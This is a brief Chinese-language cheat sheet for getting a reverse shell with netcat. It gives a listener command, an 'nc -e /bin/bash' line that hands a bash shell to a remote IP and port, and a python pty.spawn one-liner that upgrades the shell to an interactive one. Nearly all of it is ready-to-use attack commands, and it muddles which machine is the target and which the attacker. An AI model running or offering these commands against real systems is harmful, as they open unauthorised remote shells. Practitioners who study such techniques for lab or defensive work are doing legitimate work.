一、反弹shell(NC正向反弹)
1、靶机开启监听端口
格式:
nc -lvvp [任意未占用的端口号]
例:
nc -lvvp [8080]
2、攻击机将shell弹到靶机上
格式:
nc -e /bin/bash [靶机ip] [靶机监听端口]
例:
nc -e /bin/bash 192.168.120.129 8080
二、交互shell
反弹成功后需要将反弹shell升级为交互shell
命令:
python -c 'import pty;pty.spawn("/bin/bash")'